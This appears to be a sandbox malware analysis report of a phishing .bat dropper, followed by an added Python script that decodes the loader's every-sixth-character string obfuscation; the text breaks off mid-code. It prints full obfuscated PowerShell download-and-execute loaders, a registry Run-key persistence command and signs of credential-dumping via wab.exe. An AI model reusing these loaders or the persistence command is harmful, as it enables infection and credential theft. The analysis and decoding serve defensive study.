              Source: Process Memory Space: powershell.exe PID: 2084, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4972, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 504, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winBAT@47/20@7/6
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Indisposedness.Ass
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1936:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4492:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2580:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\klpcourg-793VPF
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzpsuj1k.q1u.ps1
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat" "
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2084
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4972
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=504
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6420
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: wab.exe, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 0000000B.00000002.3437548482.00000000225D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 00000010.00000002.2561698377.00000000041C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batVirustotal: Detection: 14%
              Source: MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batReversingLabs: Detection: 13%
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_17-33261
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.n
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ypvrsbyzkda"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jrikttjaylsubj"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tlouumuumtkhdxgwj"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
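Both PowerShell stages above (the one started by cmd.exe from the .bat, and the one started by wscript.exe from the dropped .vbs) hide every meaningful string behind the same trick: a helper function (Sortkridtstegningens in the first stage, Beshout in the second) that reassembles the name "Substring" at runtime and then keeps one character out of every six from a junk-padded literal, starting at index 5 and stopping at Length-1 so the final padding chunk is ignored. The decoded strings are then handed to a second helper (Caprellidae / Lovbundnes) that invokes them. The following is an added example, not part of the Joe Sandbox report or of the malware, that reimplements that decoder, locates the helper's name, start index and step in a captured command line, and decodes every literal passed to it. The sample command line, its variable and function names, the URL and the user agent in it are constructed for the example; the two short literals taken from the report (`$Fligene` and `$Lrredskjolernes`) decode to `iex` and `User-Agent`, which is what the invoker helper and the later web request need. One caveat when working from this page rather than from a raw process log: several longer literals (for instance `$festdragtens` and the `$Haandvrksbagere` literal that ends up as the `echo %appdata%\Indisposedness.Ass && echo t` child process) appear to have had runs of whitespace collapsed or wrapped in rendering, and from such a point the six-character frame drifts by one, so decode those from the sandbox's raw command-line capture.

```python
import re

# Mirrors the loader's Substring-based decoder: walk the junk-padded literal
# from index 5 in steps of 6, keep one character per step, and stop at
# Length-1 so the trailing pad chunk is never read.
def decode_every_sixth(blob: str, start: int = 5, step: int = 6) -> str:
    limit = len(blob) - 1  # $Makah = $Udlossende.Length - $Disseizure, with $Disseizure = 1
    return "".join(blob[i] for i in range(start, limit, step))

# Constructed inverse, used only to build realistic test input: five junk
# characters before each payload character, plus one trailing pad character
# so the decoder's Length-1 bound does not drop the last payload character.
def encode_every_sixth(plain: str, junk: str = "abcde") -> str:
    return "".join(junk + c for c in plain) + " "

# Find the decoder's definition in a captured command line and read its
# name, start index and step, so the script's randomised names do not matter.
DECODER_DEF = re.compile(
    r"Function\s+(\w+)\(\$\w+\)\{.*?For\(\$\w+=(\d+);.*?\+=(\d+)\)", re.S
)

def recover_strings(cmdline: str) -> list[str]:
    """Return every quoted literal passed to the decoder, in order, decoded."""
    m = DECODER_DEF.search(cmdline)
    if not m:
        return []
    name, start, step = m.group(1), int(m.group(2)), int(m.group(3))
    calls = re.compile(re.escape(name) + r" '([^']*)'")
    return [decode_every_sixth(blob, start, step) for blob in calls.findall(cmdline)]

# Two short literals as they appear in the report's first PowerShell stage.
FLIGENE_LITERAL = " Molyi ForheTopsax pers "
LRREDSKJOLERNES_LITERAL = " ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav "

# Constructed sample in the same shape as the report's command lines; the
# variable and function names, URL and user agent are invented.
SAMPLE_CMDLINE = (
    "powershell.exe -windowstyle hidden \"$Alpha='S';$Alpha+='ubs';$Alpha+='tri';"
    "$Beta = 1;$Alpha+='ng';Function Decode($Blob){$Max=$Blob.Length-$Beta;"
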